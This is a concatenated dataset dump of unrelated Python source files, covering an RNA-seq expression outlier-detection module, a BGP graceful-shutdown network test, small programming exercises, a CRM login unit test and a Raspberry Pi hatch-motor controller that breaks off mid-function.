Please use the pandas.tseries module instead.\n\"\"\"\n\n\nclass Outliers(object):\n \"\"\"Methods and attributes of outliers.\"\"\"\n\n def __init__(self, pheno_loc, output_prefix, outlier_postfix,\n extrema, distribution, threshold, cov, exclude_ids,\n n_processes, logger):\n \"\"\"Initialize outlier dataframe.\n\n Args:\n pheno_loc (:obj:`str`): gene expression (phenotype) location\n output_prefix (:obj:`str`): file prefix for outputs\n outlier_postfix (:obj:`str`): file ending for outlier files\n extrema (:obj:`boolean`): T/F for using most extreme outlier\n distribution (:obj:`str`): type of outlier distribution considered\n threshold (:obj:`list`): list of outlier cut-off thresholds\n n_processes (:obj:`int`): number of workers/cores to run at a time\n logger (:obj:`logging object`): Current logger\n\n Attributes:\n expr_long_df (:obj:`DataFrame`): RNAseq expression in long format\n expr_outs_loc (:obj:`str`): full outlier file location\n extrema (:obj:`boolean`): T/F for using most extreme outlier\n distribution (:obj:`str`): type of outlier distribution considered\n threshold (:obj:`list`): list of outlier cut-off thresholds\n least_extr_threshold (:obj:`float`): least extreme threshold\n\n Raises:\n :obj:`RNASeqError`: if `distribution` is not valid, i.e., not in\n [\"normal\", \"rank\", \"custom\"]\n\n TODO:\n low_memory is deprecated so instead specify any ambiguous dtypes\n https://stackoverflow.com/questions/24251219/pandas-read-csv-low-memory-and-dtype-options\n\n \"\"\"\n gene_expr_df = pd.read_table(pheno_loc, low_memory=False)\n gene_expr_df = gene_expr_df.iloc[:, 3:]\n # logger.debug(gene_expr_df.head())\n self.n_processes = n_processes\n gene_expr_df.rename(columns={gene_expr_df.columns[0]: \"gene\"},\n inplace=True)\n if exclude_ids:\n logger.debug(\"Expr DF size before excluding IDs:\")\n logger.debug(gene_expr_df.shape)\n exclude_ids_in_df = [\n i for i in exclude_ids if i in gene_expr_df.columns]\n if exclude_ids_in_df:\n gene_expr_df.drop(exclude_ids_in_df, axis=1, inplace=True)\n logger.debug(\"Expr DF size AFTER excluding IDs:\")\n logger.debug(gene_expr_df.shape)\n # if calculating covariates, re-normalize\n self.cov = cov\n \"\"\"Re-calculating the z-score (not sure if appropriate)\n # if self.cov:\n gene_expr_df = self.recalculate_Zscore(gene_expr_df)\n # \"\"\"\n # Convert gene expression data frame from wide to long:\n self.expr_long_df = pd.melt(\n gene_expr_df,\n id_vars='gene', # gene_expr_df.columns.values[0], # 'gene',\n value_vars=gene_expr_df.columns[1:].tolist(),\n var_name='blinded_id',\n value_name='z_expr')\n # logger.debug(self.expr_long_df.head())\n # logger.debug(self.expr_long_df.shape)\n # set the output file location\n self.expr_outs_loc = (output_prefix + \"_outliers.txt\")\n if outlier_postfix:\n self.expr_outs_loc = outlier_postfix\n # self.expr_outs_loc = (output_prefix + \"_\" + outlier_postfix)\n # set states on which specific outlier definitions are being used\n self.extrema = extrema\n self.distribution = distribution\n self.threshold = threshold\n if isinstance(self.threshold, float):\n self.least_extr_threshold = threshold\n elif self.distribution == \"normal\":\n self.least_extr_threshold = min(self.threshold)\n elif self.distribution == \"rank\":\n self.least_extr_threshold = max(self.threshold)\n elif self.distribution == \"custom\":\n self.least_extr_threshold = 1\n else:\n raise RNASeqError(\"'{}' is not a valid outlier distribution\".\n format(distribution))\n # logger.debug(self.least_extr_threshold)\n\n def 
prepare_outliers(self, outlier_max, vcf_id_list, logger):\n \"\"\"Obtain gene expression outliers.\n\n Args:\n outlier_max (:obj:`int`): maximum number of outliers per ID\n vcf_id_list (:obj:`list`): list of Blinded IDs with WGS\n logger (:obj:`logging object`): Current logger\n\n Check if expression outlier file already exists. If it does not,\n use `get_outliers` to obtain outliers using only IDs\n with WGS. Once these outliers are obtained, plot a histogram\n of the number of outliers per ID. If there is a maximum\n number of outliers per ID specified, then remove IDs that\n cross this threshold and call outliers again. Save the\n outlier dataframe to `expr_outs_loc`\n\n \"\"\"\n if os.path.exists(self.expr_outs_loc):\n print(\"Already made outlier file \" + self.expr_outs_loc)\n return \"Already made outlier file \" + self.expr_outs_loc\n # only work with IDs in WGS that are also in the RNAseq\n lines_w_consistent_ids = self.expr_long_df.blinded_id.isin(vcf_id_list)\n if lines_w_consistent_ids.sum() == 0:\n raise RNASeqError(\"No overlapping IDs between RNAseq and VCF\")\n self.expr_long_df = self.expr_long_df[lines_w_consistent_ids]\n if self.cov:\n print(\"before regression:\")\n print(self.expr_long_df.head())\n self.expr_long_df = self.regress_out_covarates(self.cov)\n print(\"AFTER regression:\")\n print(self.expr_long_df.head())\n # logger.debug(self.expr_long_df.head())\n # logger.debug(self.expr_long_df.shape)\n # actually calculate the outliers\n self.get_outliers(vcf_id_list)\n outs_per_id_file = re.sub('.txt', '_outliers_per_id_ALL',\n self.expr_outs_loc)\n plot_outs_per_id(self.expr_long_df, outs_per_id_file)\n outs_per_id_file = re.sub('.txt', '_outliers_per_id',\n self.expr_outs_loc)\n # determine which IDs have too many outliers (and remove these)\n if outlier_max:\n outs_per_id = self.expr_long_df[[\n 'blinded_id', 'expr_outlier']].groupby('blinded_id').sum()\n while any(outs_per_id.expr_outlier >= outlier_max):\n ids_to_keep = self.get_ids_w_low_out_ct(\n self.expr_long_df, outlier_max)\n lines_w_consistent_ids = self.expr_long_df.blinded_id.isin(\n ids_to_keep)\n if lines_w_consistent_ids.shape[0] == 0:\n raise RNASeqError(\"No IDs with <{} outliers\".format(\n outlier_max))\n self.expr_long_df = self.expr_long_df[lines_w_consistent_ids]\n self.get_outliers(ids_to_keep)\n plot_outs_per_id(self.expr_long_df, outs_per_id_file)\n outs_per_id = self.expr_long_df[[\n 'blinded_id', 'expr_outlier']].groupby('blinded_id').sum()\n # print(any(outs_per_id.expr_outlier >= outlier_max))\n self.remove_divergent_genes()\n # write `self.expr_long_df` to file\n print(\"Saving outlier status dataframe to\", self.expr_outs_loc)\n self.expr_long_df.to_csv(self.expr_outs_loc, sep=\"\\t\", index=False)\n\n def get_outliers(self, ids_to_keep):\n \"\"\"Calculate RNAseq outliers.\n\n Updates:\n `expr_long_df` (:obj:`DataFrame`): outliers per gene across\n all genes in long format\n\n Raises:\n :obj:`RNASeqError`: if there are no overlapping IDs between\n the RNAseq and WGS or if `distribution` is not valid\n\n Loads RNAseq in BED format (same format used for FastQTL),\n then identifies outliers.\n\n TODO:\n Clean/incorporate parallelization method and/or ask stackoverflow\n on options for vectorizing the `find_expr_outlier` function\n Confirm expr_cut_off is an acceptable value for normal/rank/custom\n Check that WGS IDs are consistent with outlier IDs\n\n \"\"\"\n if self.distribution == \"normal\":\n self.identify_outliers_from_normal(ids_to_keep)\n elif self.distribution == \"rank\":\n 
self.expr_long_df = self.identify_outliers_from_ranks()\n elif self.distribution == \"custom\":\n not_0_1 = ~self.expr_long_df.z_expr.isin([0, 1])\n if any(not_0_1):\n print(self.expr_long_df[not_0_1].head())\n raise RNASeqError(\"The values above were not 0 or 1\")\n self.expr_long_df[\"expr_outlier\"] = self.expr_long_df.z_expr == 1\n # set expr_outlier_neg and expr_outlier_pos as 0 for custom\n self.expr_long_df[\"expr_outlier_neg\"] = 0\n self.expr_long_df[\"expr_outlier_pos\"] = 0\n else:\n raise RNASeqError(\"'{}' is not a valid outlier distribution\".\n format(self.distribution))\n if self.extrema:\n self.find_most_extreme_expr_outlier()\n\n def identify_outliers_from_normal(self, ids_to_keep):\n \"\"\"Identify outliers more extreme than a z-score threshold.\n\n TODO:\n All three lines raise a SettingWithCopyWarning when the column\n already exists in the dataframe. Unclear why or if this is an issue\n\n \"\"\"\n # print(\"(Re)calculating z-scores per gene...\")\n print(\"Calculating z-score outliers....\")\n self.expr_long_df = self.expr_long_df.assign(\n z_abs=abs(self.expr_long_df.z_expr))\n self.expr_long_df = self.expr_long_df.assign(\n expr_outlier=self.expr_long_df.z_abs > self.least_extr_threshold)\n self.expr_long_df = self.expr_long_df.assign(\n expr_outlier_neg=(self.expr_long_df.z_expr < 0) &\n self.expr_long_df.expr_outlier)\n self.expr_long_df = self.expr_long_df.assign(\n expr_outlier_pos=(self.expr_long_df.z_expr > 0) &\n self.expr_long_df.expr_outlier)\n # self.remove_divergent_genes(ids_to_keep)\n\n def remove_divergent_genes(self):\n \"\"\"Remove genes where more than 5% of genes are outliers.\"\"\"\n # self.expr_long_df.set_index(['gene', 'blinded_id'], inplace=True)\n # print(self.expr_long_df.index.get_level_values(\n # 'gene').unique())\n uniq_ids = self.expr_long_df.blinded_id.unique()\n print(\"Removing genes where more than 5% are outliers across \" +\n str(len(uniq_ids)) + \" samples.\")\n if (self.distribution == \"normal\") and self.extrema:\n self.expr_long_df = self.expr_long_df.assign(\n expr_outlier_NOT_extrema=self.expr_long_df.z_abs >\n self.least_extr_threshold)\n outs_per_gene_ct = self.expr_long_df.groupby(\n 'gene')['expr_outlier_NOT_extrema'].transform('sum')\n self.expr_long_df.drop(\n ['expr_outlier_NOT_extrema'], axis=1, inplace=True)\n elif self.distribution == \"rank\":\n # Temporary just to confirm using same genes across all comparisons\n return None\n self.expr_long_df = self.expr_long_df.assign(\n expr_outlier_NOT_rank=abs(self.expr_long_df.z_expr) > 2)\n outs_per_gene_ct = self.expr_long_df.groupby(\n 'gene')['expr_outlier_NOT_rank'].transform('sum')\n self.expr_long_df.drop(\n ['expr_outlier_NOT_rank'], axis=1, inplace=True)\n else:\n outs_per_gene_ct = self.expr_long_df.groupby(\n 'gene')['expr_outlier'].transform('sum')\n outs_per_gene_NOT_reasonable = (\n 0.05*len(uniq_ids)) < outs_per_gene_ct\n # genes_to_rm = self.expr_long_df[\n # outs_per_gene_NOT_reasonable].index.get_level_values(\n # 'gene').unique()\n genes_to_rm = self.expr_long_df[\n outs_per_gene_NOT_reasonable]['gene'].unique()\n print(\"More than 1/20 samples have outliers more more extreme \" +\n \"than Z={} for {} genes\".format(\n str(self.least_extr_threshold), str(len(genes_to_rm))))\n self.expr_long_df = self.expr_long_df[~outs_per_gene_NOT_reasonable]\n if self.expr_long_df.shape[0] == 0:\n raise RNASeqError(\"All genes have >1/20 samples as outliers\")\n\n def identify_outliers_from_ranks(self):\n \"\"\"Identify outliers based on those more extreme than 
percentile.\n\n Args\n `least_extr_threshold`: percentile cut-off for outliers\n\n \"\"\"\n print(\"Calculating ranks...\")\n expr_long_df = applyParallel(self.expr_long_df.groupby(\n 'gene'), self.calculate_ranks,\n self.n_processes)\n print(\"Ranks calculated, identifying outliers\")\n min_expr_cut_off = min(set(expr_long_df.expr_rank))\n if (self.least_extr_threshold <= min_expr_cut_off) or (\n self.least_extr_threshold >= 0.5):\n raise RNASeqError(\"The percentile cut-off specified ({}) is \" +\n \"not between 0.5 and the minimum cut-off \" +\n \"for this sample size, {}\".format(\n self.least_extr_threshold, min_expr_cut_off))\n # print((\"The percentile cut-off specified ({}) is \" +\n # \"not between 0.5 and the minimum cut-off \" +\n # \"for this sample size, {}\").format(\n # self.least_extr_threshold, min_expr_cut_off))\n # self.least_extr_threshold = min_expr_cut_off\n hi_expr_cut_off = 1 - self.least_extr_threshold\n expr_long_df[\"expr_outlier_neg\"] = (\n expr_long_df.expr_rank <= self.least_extr_threshold)\n expr_long_df[\"expr_outlier_pos\"] = (\n expr_long_df.expr_rank >= hi_expr_cut_off)\n expr_long_df[\"expr_outlier\"] = (\n expr_long_df.expr_outlier_pos |\n expr_long_df.expr_outlier_neg)\n return expr_long_df\n\n @staticmethod\n def calculate_ranks(gene_group):\n \"\"\"Calculate ranks for each gene.\n\n Args\n `gene_group`: expression for all IDs for a single gene\n\n Returns\n `gene_group`: with expr_rank which is the percentile\n\n \"\"\"\n gene_group[\"expr_rank\"] = gene_group[\"z_expr\"].rank(method='average',\n pct=True)\n return gene_group\n\n @staticmethod\n def recalculate_Zscore(expr_df):\n \"\"\"Re-calculate the z-score for expression data.\"\"\"\n expr_df.set_index(['gene'], inplace=True)\n expr_df_mean = expr_df.mean(axis=1)\n expr_df_std = expr_df.std(axis=1)\n expr_df = expr_df.sub(expr_df_mean, axis=0)\n expr_df = expr_df.div(expr_df_std, axis=0)\n expr_df.reset_index(inplace=True)\n return expr_df\n\n def regress_out_covarates(self, cov_loc):\n \"\"\"Regress out covariates from the re-scaled expression matrix.\n\n Should we perform separate regressions for every gene or a single\n regression for all genes? 
Separate regressions because the\n parameters and variances will likely have wildly different\n estimates for different genes\n\n Source: https://stackoverflow.com/a/32102764\n\n \"\"\"\n cov_df = pd.read_table(cov_loc, header=None)\n id_var = cov_df.iloc[0][0]\n cov_long = cov_df.set_index([0]).transpose().set_index(id_var)\n cov_long = cov_long.apply(pd.to_numeric, errors='ignore')\n calculate_residuals_per_gene_partial = partial(\n self.calculate_residuals_per_gene, cov_long=cov_long)\n expr_long_df_residuals = applyParallel(self.expr_long_df.groupby(\n 'gene'), calculate_residuals_per_gene_partial,\n self.n_processes)\n return expr_long_df_residuals\n\n @staticmethod\n def calculate_residuals_per_gene(per_gene_df, cov_long):\n \"\"\"Calculate the residuals per gene.\"\"\"\n # make sure they have the same index before joining\n per_gene_df.set_index('blinded_id', inplace=True)\n current_gene = per_gene_df['gene'][0]\n del per_gene_df['gene']\n cov_long.index.name = per_gene_df.index.name\n per_gene_df.columns = ['gene_expr']\n # join covariates with expression\n per_gene_df = cov_long.join(per_gene_df, how='inner')\n # calculate residuals after regressing out covariates\n # sources: https://stackoverflow.com/a/32103366\n x_df = sm.add_constant(per_gene_df.iloc[:, :-1])\n model = sm.OLS(per_gene_df.gene_expr, x_df).fit()\n # return residuals added to the mean\n res_df = pd.DataFrame({'z_expr': model.resid + model.params.const})\n res_df.reset_index(inplace=True)\n res_df['gene'] = current_gene\n # return model.resid + model.params.const\n return res_df\n\n def test_normality(self):\n \"\"\"Check if each gene has normal distribution.\n\n TODO:\n Options include QQ-plots, shapiro-wilk test and others.\n\n \"\"\"\n return True\n\n def find_most_extreme_expr_outlier(self):\n \"\"\"Loop over every gene in parallel, find the most extreme outlier.\n\n Updates attributes:\n `expr_long_df` (:obj:`DataFrame`): outliers per gene across\n all genes in long format\n\n \"\"\"\n print(\"Identifying most extreme outlier per gene...\")\n print(self.expr_long_df.head())\n print(self.expr_long_df.shape)\n self.expr_long_df = applyParallel(self.expr_long_df.groupby(\n 'gene'), self.find_most_extreme_expr_outlier_per_gene,\n self.n_processes)\n self.expr_long_df['expr_outlier_neg'] = (\n self.expr_long_df.expr_outlier_neg &\n self.expr_long_df.expr_outlier)\n self.expr_long_df['expr_outlier_pos'] = (\n self.expr_long_df.expr_outlier_pos &\n self.expr_long_df.expr_outlier)\n\n @staticmethod\n def find_most_extreme_expr_outlier_per_gene(gene_group):\n \"\"\"Label outliers in a group.\n\n Create a column for absolute value of expression z-score, determine\n which `blinded_id` has the maximum expression z-score to\n create `expr_outlier_status` column, then determine if any of these\n outliers have z-scores < 0 (i.e., are low or negative outliers).\n\n Args:\n `gene_group`: long-format expression dataframe for a gene\n\n \"\"\"\n gene_group['expr_outlier'] = (\n (gene_group.z_abs == max(gene_group.z_abs)) &\n gene_group.expr_outlier)\n return gene_group\n\n @staticmethod\n def get_ids_w_low_out_ct(expr_outlier_df, outlier_max):\n \"\"\"Identify and remove blinded_ids with a ton of outliers.\n\n Args:\n `expr_outlier_df`: long-format expression dataframe\n labeling each gene-ID as an outlier\n `outlier_max`: maximum number of outliers per ID\n\n \"\"\"\n outs_per_id = expr_outlier_df[['blinded_id', 'expr_outlier']].groupby(\n 'blinded_id').sum()\n ids_w_hi_out_ct = list(\n outs_per_id[outs_per_id.expr_outlier >= 
outlier_max].index)\n print(\"The following IDs have >= {} outliers each: {}\".format(\n outlier_max, \", \".join(ids_w_hi_out_ct)))\n ids_to_keep = list(\n outs_per_id[outs_per_id.expr_outlier < outlier_max].index)\n return ids_to_keep\n","repo_name":"frichter/ore","sub_path":"ore/outliers.py","file_name":"outliers.py","file_ext":"py","file_size_in_byte":20053,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"19942512225","text":"def fibo(n):\n if n == 0:\n return 0\n if n == 1 or n == 2:\n return 1\n return fibo(n-1) + fibo(n-2)\n\n\nfor i in range(11):\n ans = fibo(i)\n print(\"Fibo of {}: {}\".format(i,ans))","repo_name":"pmihsan/SampleCodes","sub_path":"Python/Functions/RecursiveFibo.py","file_name":"RecursiveFibo.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23733475488","text":"import os\nimport re\nimport sys\nimport json\nimport pytest\nimport platform\nfrom functools import partial\n\nCWD = os.path.dirname(os.path.realpath(__file__))\nsys.path.append(os.path.join(CWD, \"../\"))\n\n# pylint: disable=C0413\nfrom lib import topotest\nfrom lib.topogen import Topogen, TopoRouter, get_topogen\nfrom lib.topolog import logger\n\npytestmark = [pytest.mark.bgpd]\n\n\ndef build_topo(tgen):\n for routern in range(1, 6):\n tgen.add_router(\"r{}\".format(routern))\n\n switch = tgen.add_switch(\"s1\")\n switch.add_link(tgen.gears[\"r1\"])\n switch.add_link(tgen.gears[\"r2\"])\n\n switch = tgen.add_switch(\"s2\")\n switch.add_link(tgen.gears[\"r2\"])\n switch.add_link(tgen.gears[\"r3\"])\n\n switch = tgen.add_switch(\"s3\")\n switch.add_link(tgen.gears[\"r2\"])\n switch.add_link(tgen.gears[\"r4\"])\n\n switch = tgen.add_switch(\"s4\")\n switch.add_link(tgen.gears[\"r2\"])\n switch.add_link(tgen.gears[\"r5\"])\n\n\ndef _run_cmd_and_check(router, cmd, results_file, retries=100, intvl=0.5):\n json_file = \"{}/{}\".format(CWD, results_file)\n expected = json.loads(open(json_file).read())\n test_func = partial(topotest.router_json_cmp, router, cmd, expected)\n return topotest.run_and_expect(test_func, None, retries, intvl)\n\n\ndef setup_module(mod):\n tgen = Topogen(build_topo, mod.__name__)\n tgen.start_topology()\n\n router_list = tgen.routers()\n krel = platform.release()\n if topotest.version_cmp(krel, \"4.5\") < 0:\n tgen.errors = \"Linux kernel version of at least 4.5 needed for bgp-gshut tests\"\n pytest.skip(tgen.errors)\n\n # Configure vrf and its slaves in the kernel on r2\n r2 = tgen.gears[\"r2\"]\n r2.run(\"ip link add vrf1 type vrf table 1000\")\n r2.run(\"ip link set vrf1 up\")\n r2.run(\"ip link set r2-eth2 master vrf1\")\n r2.run(\"ip link set r2-eth3 master vrf1\")\n\n # Load FRR config and initialize all routers\n for i, (rname, router) in enumerate(router_list.items(), 1):\n router.load_config(\n TopoRouter.RD_ZEBRA, os.path.join(CWD, \"{}/zebra.conf\".format(rname))\n )\n router.load_config(\n TopoRouter.RD_BGP, os.path.join(CWD, \"{}/bgpd.conf\".format(rname))\n )\n\n tgen.start_router()\n\n # Basic peering test to see if things are ok\n _, result = _run_cmd_and_check(r2, \"show ip bgp summary json\", \"r2/bgp_sum_1.json\")\n assertmsg = \"R2: Basic sanity test after init failed -- global peerings not up\"\n assert result is None, assertmsg\n\n _, result = _run_cmd_and_check(\n r2, \"show ip bgp vrf vrf1 summary json\", \"r2/bgp_sum_2.json\"\n )\n assertmsg = \"R2: Basic sanity test after init failed -- VRF 
peerings not up\"\n assert result is None, assertmsg\n\n\ndef teardown_module(mod):\n tgen = get_topogen()\n tgen.stop_topology()\n\n\ndef test_bgp_gshut():\n tgen = get_topogen()\n\n if tgen.routers_have_failure():\n pytest.skip(tgen.errors)\n\n r1 = tgen.gears[\"r1\"]\n r2 = tgen.gears[\"r2\"]\n r3 = tgen.gears[\"r3\"]\n r4 = tgen.gears[\"r4\"]\n r5 = tgen.gears[\"r5\"]\n\n # Verify initial route states\n logger.info(\"\\nVerify initial route states\")\n\n _, result = _run_cmd_and_check(\n r1, \"show ip bgp 13.1.1.1/32 json\", \"r1/bgp_route_1.json\"\n )\n assertmsg = \"R1: Route 13.1.1.1/32 not present or has unexpected params\"\n assert result is None, assertmsg\n\n _, result = _run_cmd_and_check(\n r3, \"show ip bgp 11.1.1.1/32 json\", \"r3/bgp_route_1.json\"\n )\n assertmsg = \"R3: Route 11.1.1.1/32 not present or has unexpected params\"\n assert result is None, assertmsg\n\n _, result = _run_cmd_and_check(\n r5, \"show ip bgp 14.1.1.1/32 json\", \"r5/bgp_route_1.json\"\n )\n assertmsg = \"R5: Route 14.1.1.1/32 not present or has unexpected params\"\n assert result is None, assertmsg\n\n logger.info(\"\\nInitial route states are as expected\")\n\n # \"Test #1: Enable BGP-wide graceful-shutdown on R2 and check routes on peers\"\n logger.info(\n \"\\nTest #1: Enable BGP-wide graceful-shutdown on R2 and check routes on peers\"\n )\n\n r2.vtysh_cmd(\n \"\"\"\n configure terminal\n bgp graceful-shutdown\n \"\"\"\n )\n\n # R1, R3 and R5 should see routes from R2 with GSHUT. In addition,\n # R1 should see LOCAL_PREF of 0\n _, result = _run_cmd_and_check(\n r1, \"show ip bgp 13.1.1.1/32 json\", \"r1/bgp_route_2.json\"\n )\n assertmsg = \"R1: Route 13.1.1.1/32 not present or has unexpected params\"\n assert result is None, assertmsg\n\n _, result = _run_cmd_and_check(\n r3, \"show ip bgp 11.1.1.1/32 json\", \"r3/bgp_route_2.json\"\n )\n assertmsg = \"R3: Route 11.1.1.1/32 not present or has unexpected params\"\n assert result is None, assertmsg\n\n _, result = _run_cmd_and_check(\n r5, \"show ip bgp 14.1.1.1/32 json\", \"r5/bgp_route_2.json\"\n )\n assertmsg = \"R5: Route 14.1.1.1/32 not present or has unexpected params\"\n assert result is None, assertmsg\n\n logger.info(\n \"\\nTest #1: Successful, routes have GSHUT and/or LPREF of 0 as expected\"\n )\n\n # \"Test #2: Turn off BGP-wide graceful-shutdown on R2 and check routes on peers\"\n logger.info(\n \"\\nTest #2: Turn off BGP-wide graceful-shutdown on R2 and check routes on peers\"\n )\n\n r2.vtysh_cmd(\n \"\"\"\n configure terminal\n no bgp graceful-shutdown\n \"\"\"\n )\n\n # R1, R3 and R5 should see routes from R2 with their original attributes\n _, result = _run_cmd_and_check(\n r1, \"show ip bgp 13.1.1.1/32 json\", \"r1/bgp_route_1.json\"\n )\n assertmsg = \"R1: Route 13.1.1.1/32 not present or has unexpected params\"\n assert result is None, assertmsg\n\n _, result = _run_cmd_and_check(\n r3, \"show ip bgp 11.1.1.1/32 json\", \"r3/bgp_route_1.json\"\n )\n assertmsg = \"R3: Route 11.1.1.1/32 not present or has unexpected params\"\n assert result is None, assertmsg\n\n _, result = _run_cmd_and_check(\n r5, \"show ip bgp 14.1.1.1/32 json\", \"r5/bgp_route_1.json\"\n )\n assertmsg = \"R5: Route 14.1.1.1/32 not present or has unexpected params\"\n assert result is None, assertmsg\n\n logger.info(\n \"\\nTest #2: Successful, routes have their original attributes with default LPREF and without GSHUT\"\n )\n\n # \"Test #3: Enable graceful-shutdown on R2 only in VRF1 and check routes on peers\"\n logger.info(\n \"\\nTest #3: Enable 
graceful-shutdown on R2 only in VRF1 and check routes on peers\"\n )\n\n r2.vtysh_cmd(\n \"\"\"\n configure terminal\n router bgp 65001 vrf vrf1\n bgp graceful-shutdown\n \"\"\"\n )\n\n # R1 and R3 should see no change to their routes\n _, result = _run_cmd_and_check(\n r1, \"show ip bgp 13.1.1.1/32 json\", \"r1/bgp_route_1.json\"\n )\n assertmsg = \"R1: Route 13.1.1.1/32 not present or has unexpected params\"\n assert result is None, assertmsg\n\n _, result = _run_cmd_and_check(\n r3, \"show ip bgp 11.1.1.1/32 json\", \"r3/bgp_route_1.json\"\n )\n assertmsg = \"R3: Route 11.1.1.1/32 not present or has unexpected params\"\n assert result is None, assertmsg\n\n # R5 should see routes from R2 with GSHUT.\n _, result = _run_cmd_and_check(\n r5, \"show ip bgp 14.1.1.1/32 json\", \"r5/bgp_route_2.json\"\n )\n assertmsg = \"R5: Route 14.1.1.1/32 not present or has unexpected params\"\n assert result is None, assertmsg\n\n logger.info(\"\\nTest #3: Successful, only VRF peers like R5 see routes with GSHUT\")\n\n # \"Test #4: Try to enable BGP-wide graceful-shutdown on R2 while it is configured in VRF1\"\n logger.info(\n \"\\nTest #4: Try to enable BGP-wide graceful-shutdown on R2 while it is configured in VRF1\"\n )\n\n ret = r2.vtysh_cmd(\n \"\"\"\n configure terminal\n bgp graceful-shutdown\n \"\"\"\n )\n\n # This should fail\n assertmsg = \"R2: BGP-wide graceful-shutdown config not rejected even though it is enabled in VRF1\"\n assert (\n re.search(\"global graceful-shutdown not permitted\", ret) is not None\n ), assertmsg\n\n logger.info(\n \"\\nTest #4: Successful, BGP-wide graceful-shutdown rejected as it is enabled in VRF\"\n )\n\n # \"Test #5: Turn off graceful-shutdown on R2 in VRF1 and check routes on peers\"\n logger.info(\n \"\\nTest #5: Turn off graceful-shutdown on R2 in VRF1 and check routes on peers\"\n )\n\n r2.vtysh_cmd(\n \"\"\"\n configure terminal\n router bgp 65001 vrf vrf1\n no bgp graceful-shutdown\n \"\"\"\n )\n\n # R1 and R3 should see no change to their routes\n _, result = _run_cmd_and_check(\n r1, \"show ip bgp 13.1.1.1/32 json\", \"r1/bgp_route_1.json\"\n )\n assertmsg = \"R1: Route 13.1.1.1/32 not present or has unexpected params\"\n assert result is None, assertmsg\n\n _, result = _run_cmd_and_check(\n r3, \"show ip bgp 11.1.1.1/32 json\", \"r3/bgp_route_1.json\"\n )\n assertmsg = \"R3: Route 11.1.1.1/32 not present or has unexpected params\"\n assert result is None, assertmsg\n\n # R5 should see routes from R2 with original attributes.\n _, result = _run_cmd_and_check(\n r5, \"show ip bgp 14.1.1.1/32 json\", \"r5/bgp_route_1.json\"\n )\n assertmsg = \"R5: Route 14.1.1.1/32 not present or has unexpected params\"\n assert result is None, assertmsg\n\n logger.info(\n \"\\nTest #5: Successful, routes have their original attributes with default LPREF and without GSHUT\"\n )\n\n # tgen.mininet_cli()\n\n\nif __name__ == \"__main__\":\n args = [\"-s\"] + sys.argv[1:]\n sys.exit(pytest.main(args))\n","repo_name":"FRRouting/frr","sub_path":"tests/topotests/bgp_gshut/test_bgp_gshut.py","file_name":"test_bgp_gshut.py","file_ext":"py","file_size_in_byte":9490,"program_lang":"python","lang":"en","doc_type":"code","stars":2787,"dataset":"github-code","pt":"40"} +{"seq_id":"34061345820","text":"#!/usr/bin/python3\n\"\"\"\nAdding module\nThis module supplies with one function, add_integer(a, b)\n\"\"\"\ndef add_integer(a, b=98):\n \"\"\"Return add of a + b\"\"\"\n if not isinstance(a, (int, float)):\n raise TypeError(\"a must be an integer\")\n if not isinstance(b, (int, float)):\n 
raise TypeError(\"b must be an integer\")\n return a + b\n","repo_name":"Artemisse99/holbertonschool-higher_level_programming","sub_path":"0x07-python-test_driven_development/0-add_integer.py","file_name":"0-add_integer.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10937960564","text":"import allure\nfrom common.tool import testLogin\nimport unittest,warnings\nfrom common.tool import Myrequest\nimport pytest, os\nfrom config.setting import *\nfrom ddt import *\n@ddt\nclass TestLoing(unittest.TestCase):\n\n\n @file_data(r'D:\\autotest\\data\\testdata.yaml')\n @unpack\n def testLogin(self,email):\n\n url = 'self_api/auth/login'\n real_url = urljoin(TESTBASE_URL, url)\n headers = {\n 'Content-Type': 'application/json; charset=UTF-8',\n 'Origin': 'https://crm.putaoabc.com',\n 'Referer': 'https://crm.putaoabc.com/login',\n 'Accept': 'application/json',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36',\n 'Cookie': 'uuid=D58656BD-8333-AC8A-7D54-BC5090F92D60'\n\n }\n data = {\n \"email\": email,\n \"password\": '123456'\n }\n json_data = json.dumps(data)\n\n res = Myrequest.post(url=real_url,data=json_data, is_json=False, header=headers)\n\n token = res['data']['token']\n\n\n return token\n\n\n\n\nif __name__ == '__main__':\n c = TestLoing()\n c.testLogin()\n\n\n\n\n","repo_name":"journey1989/crm","sub_path":"test_case/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29484690111","text":"import time\nimport RPi.GPIO as GPIO\nimport temperature_log as tl\nimport argparse\nimport rcontrol as rc\nimport daemonizer\nimport configparser\nimport os\nimport schedule\nimport math\n\nclass HatchControler():\n def __init__(self, pin_up, pin_down):\n self.pin_up = 40\n self.pin_down = 38\n #Time\n self.sunrise = None\n self.sunset = None\n #Offset\n self.offset_morning = None\n self.offset_evening = None\n self.open_time = None\n self.close_time = None\n\n def schedule_times(self):\n print(\"Opening at : \"+self.open_time)\n print(\"Closing at :\"+self.close_time)\n schedule.every().day.at(self.open_time).do(self.move_hatch, \"open\")\n schedule.every().day.at(self.close_time).do(self.move_hatch, \"close\")\n return schedule.CancelJob\n\n def move_hatch(self, action):\n GPIO.setmode(GPIO.BOARD)\n # Motor control (0:up 1:down)\n motor = rc.Device(\"motor\", self.pin_up, self.pin_down)\n if action == \"open\":\n motor.enable(1)\n time.sleep(5)\n motor.disable(1)\n time.sleep(5)\n print(\"Hatch opened\")\n elif action == \"close\":\n motor.enable(0)\n time.sleep(5)\n motor.disable(0)\n time.sleep(5)\n print(\"Hatch closed\")\n GPIO.cleanup()\n return schedule.CancelJob\n\n def getOpenWeatherSun(self, owcity_id, owapi_key):\n # Get sunrise and sunset time\n print(\"Getting OpenWeather data\")\n for i in range(0,5):\n while True:\n try:\n weather_data = tl.get_openweather_cond(owcity_id, owapi_key)\n except:\n continue\n break\n hatch.sunrise = time.localtime(weather_data['sunrise'])\n hatch.sunset = time.localtime(weather_data['sunset']) \n risetime = str(self.sunrise.tm_hour)+\",\"+str(self.sunrise.tm_min)\n dusktime = str(self.sunset.tm_hour)+\",\"+str(self.sunset.tm_min)\n print(\"Sunrise : 